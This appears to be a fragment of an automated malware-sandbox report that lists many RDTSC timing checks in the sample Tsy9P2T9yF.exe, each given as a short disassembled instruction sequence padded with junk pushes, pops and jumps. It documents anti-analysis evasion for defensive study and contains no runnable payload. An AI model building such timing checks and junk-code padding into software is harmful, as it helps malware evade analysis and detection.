Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7BF89 second address: C7BFB7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F804CF71E78h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d pushad 0x0000000e add edi, dword ptr [ebp+122D22D9h] 0x00000014 sub dword ptr [ebp+122D1D50h], edx 0x0000001a popad 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F804CF71E80h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C1B2 second address: C7C1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C4C0 second address: C7C4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C4C4 second address: C7C4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F804C8F2DA2h 0x0000000c jmp 00007F804C8F2D9Bh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F804C8F2D9Ch 0x0000001c jnp 00007F804C8F2D96h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C590 second address: C7C5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C5A5 second address: C7C5DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+122D188Eh], edx 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F804C8F2DA7h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F804C8F2D9Ch 0x0000001e jno 00007F804C8F2D96h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C5DB second address: C7C5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D51D second address: C7D523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D523 second address: C7D527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D395 second address: C7D39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D527 second address: C7D54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jbe 00007F804CF71E76h 0x00000011 jmp 00007F804CF71E7Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F804CF71E76h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D54D second address: C7D551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E47F second address: C7E484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E484 second address: C7E489 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E489 second address: C7E49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F804CF71E76h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E49A second address: C7E50C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F804C8F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c movzx edi, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F804C8F2D98h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov si, 051Dh 0x0000002f js 00007F804C8F2D9Bh 0x00000035 or si, 6EA1h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F804C8F2D98h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D2A37h], eax 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e push eax 0x0000005f push esi 0x00000060 pop esi 0x00000061 pop eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E50C second address: C7E510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C804A1 second address: C804A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C804A6 second address: C804BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F804CF71E7Ch 0x00000011 jbe 00007F804CF71E76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C81AC3 second address: C81ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F804C8F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C85A4E second address: C85A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C85A54 second address: C85A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C85A58 second address: C85ABF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movzx edi, di 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F804CF71E78h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a add bh, FFFFFF9Eh 0x0000002d cmc 0x0000002e xchg eax, esi 0x0000002f jmp 00007F804CF71E87h 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 pushad 0x00000038 popad 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F804CF71E7Fh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88A8F second address: C88A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C86C51 second address: C86C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88A93 second address: C88AA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F804C8F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88AA2 second address: C88AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88AA8 second address: C88AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8B15A second address: C8B165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8B165 second address: C8B1F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F804C8F2D98h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F804C8F2D98h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 js 00007F804C8F2DAFh 0x0000002e jmp 00007F804C8F2DA9h 0x00000033 push 00000000h 0x00000035 movzx ebx, cx 0x00000038 push 00000000h 0x0000003a mov di, ax 0x0000003d jc 00007F804C8F2D9Ch 0x00000043 mov ebx, dword ptr [ebp+122D3845h] 0x00000049 xchg eax, esi 0x0000004a jns 00007F804C8F2DA2h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F804C8F2DA6h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8B3D9 second address: C8B3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E84h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8E5C0 second address: C8E5CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8D6C6 second address: C8D6D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8E5CA second address: C8E5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8E7EE second address: C8E7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8E7F4 second address: C8E802 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8E802 second address: C8E806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C917D5 second address: C917D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C917D9 second address: C917E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F804CF71E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C917E3 second address: C917E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8F89A second address: C8F8B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F804CF71E76h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C928C1 second address: C928CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C93828 second address: C93832 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C92AD5 second address: C92ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C92ADA second address: C92AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C92AE7 second address: C92AF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C92AF0 second address: C92AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C9395F second address: C93975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F804C8F2DA4h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F804C8F2D96h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C95809 second address: C95869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007F804CF71E81h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F804CF71E78h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007F804CF71E84h 0x00000036 push 00000000h 0x00000038 mov bx, dx 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 pop eax 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C949CE second address: C949D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C95869 second address: C95876 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C9A0A0 second address: C9A0A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C9A0A4 second address: C9A0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F804CF71E86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C9DB45 second address: C9DB69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F804C8F2D96h 0x0000000b jmp 00007F804C8F2DA2h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C9DDA8 second address: C9DDB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007F804CF71E76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C9DEE3 second address: C9DEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C9DEE9 second address: C9DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jng 00007F804CF71E78h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA7A98 second address: CA7A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA8079 second address: CA8087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F804CF71E76h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA8087 second address: CA808E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA808E second address: CA8093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA8505 second address: CA8515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jne 00007F804C8F2D96h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA8515 second address: CA8519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA891D second address: CA8922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CA8922 second address: CA8928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CAD20D second address: CAD211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CAD211 second address: CAD21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C396AF second address: C396B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C396B5 second address: C396D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804CF71E81h 0x00000009 jg 00007F804CF71E76h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C396D1 second address: C396E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C82B2F second address: C82B39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C82C19 second address: C82C1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C82C1F second address: C82C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F804CF71E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C82C29 second address: C82C60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F804C8F2DA9h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C83201 second address: C83205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C83423 second address: C8342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F804C8F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C836B2 second address: C836B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C83A78 second address: C83A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C83A89 second address: C83A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CAC46F second address: CAC485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F804C8F2DA1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CAC91B second address: CAC934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007F804CF71E7Ch 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CACA8C second address: CACABB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F804C8F2DB6h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CACDA0 second address: CACDB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 je 00007F804CF71E76h 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CACDB0 second address: CACDE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA4h 0x00000007 jg 00007F804C8F2D9Eh 0x0000000d ja 00007F804C8F2D96h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F804C8F2DA2h 0x0000001f jne 00007F804C8F2D96h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: CACDE6 second address: CACDEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
